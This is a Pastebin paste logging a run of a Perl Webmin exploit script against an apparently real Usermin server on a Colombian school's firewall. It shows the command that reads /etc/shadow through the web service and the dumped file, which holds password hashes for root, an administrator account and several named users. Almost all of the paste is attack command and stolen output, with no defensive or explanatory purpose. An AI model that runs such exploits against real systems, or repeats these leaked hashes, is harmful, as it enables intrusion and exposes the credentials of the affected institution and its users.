Want more features on Pastebin? Sign Up, it's FREE!
Guest

Untitled

By: a guest on May 17th, 2010  |  syntax: None  |  size: 2.04 KB  |  views: 982  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. root@bt:~# ./web.pl 192.168.1.33 20000 /etc/shadow 1
  2. WEBMIN EXPLOIT !!!!! coded by UmZ!
  3. Comments and Suggestions are welcome at umz32.dll [at] gmail.com
  4. Vulnerability disclose at securitydot.net
  5. I am just coding it in perl 'cuz I hate PHP!
  6. Attacking 192.168.1.33 on port 20000!
  7. FILENAME:  /etc/shadow
  8. FILE CONTENT STARTED
  9. -------------------------------------------
  10. HTTP/1.0 200 Document follows
  11. Connection: close
  12. Date: Tue, 18 May 2010 04:00:18 GMT
  13. Server: MiniServ/0.01
  14. Content-Length: 971
  15. Content-Type: text/plain
  16. Last-Modified: Fri, 17 Jul 2009 03:12:26 GMT
  17. Client-Date: Tue, 18 May 2010 04:00:36 GMT
  18. Client-Peer: 192.168.1.33:20000
  19. Client-Response-Num: 1
  20. Client-SSL-Cert-Issuer: /O=Usermin Webserver on firewall.emiliovalenzuela.edu.co/CN=*/emailAddress=root@firewall.emiliovalenzuela.edu.co
  21. Client-SSL-Cert-Subject: /O=Usermin Webserver on firewall.emiliovalenzuela.edu.co/CN=*/emailAddress=root@firewall.emiliovalenzuela.edu.co
  22. Client-SSL-Cipher: AES256-SHA
  23. Client-SSL-Warning: Peer certificate not verified
  24.  
  25. root:$1$R7TgbQtV$wlPh2IwVM52TGU9lMQ/7C/:14442:0:99999:7:::
  26. bin:*:14372:0:99999:7:::
  27. daemon:*:14372:0:99999:7:::
  28. adm:*:14372:0:99999:7:::
  29. lp:*:14372:0:99999:7:::
  30. sync:*:14372:0:99999:7:::
  31. shutdown:*:14372:0:99999:7:::
  32. halt:*:14372:0:99999:7:::
  33. mail:*:14372:0:99999:7:::
  34. news:*:14372:0:99999:7:::
  35. uucp:*:14372:0:99999:7:::
  36. operator:*:14372:0:99999:7:::
  37. games:*:14372:0:99999:7:::
  38. nobody:*:14372:0:99999:7:::
  39. rpm:!!:14372:0:99999:7:::
  40. messagebus:!!:14372::::::
  41. vcsa:!!:14372::::::
  42. avahi:!!:14372::::::
  43. haldaemon:!!:14372::::::
  44. rpc:!!:14372::::::
  45. rpcuser:!!:14372::::::
  46. sshd:!!:14372::::::
  47. www:!!:14372::::::
  48. lugarcia:$1$rCzNmQ8b$2K/DTpT12sDURaZ0IgFlt.:14373:0:99999:7:::
  49. squid:!!:14373::::::
  50. copias:!!:14374:0:99999:7:::
  51. joomla:$1$E8mdoe/5$TGvaT5MJjVFynEB9RrRgH0:14382:0:99999:7:::
  52. mriveros:$1$YMn9Kh2B$Mk0hRT0FVJQ3B4x9yhoW70:14377:0:99999:7:::
  53. moodle:$1$5P0ZLdJi$HsKlIxR1lxA7Ny1DR4IpD1:14383:0:99999:7:::
  54. administrador:$1$3ZnDYDLn$JKXWBAmKx/tOggQoPQ2g7.:14404:0:99999:7:::
  55. -------------------------------------------
clone this paste RAW Paste Data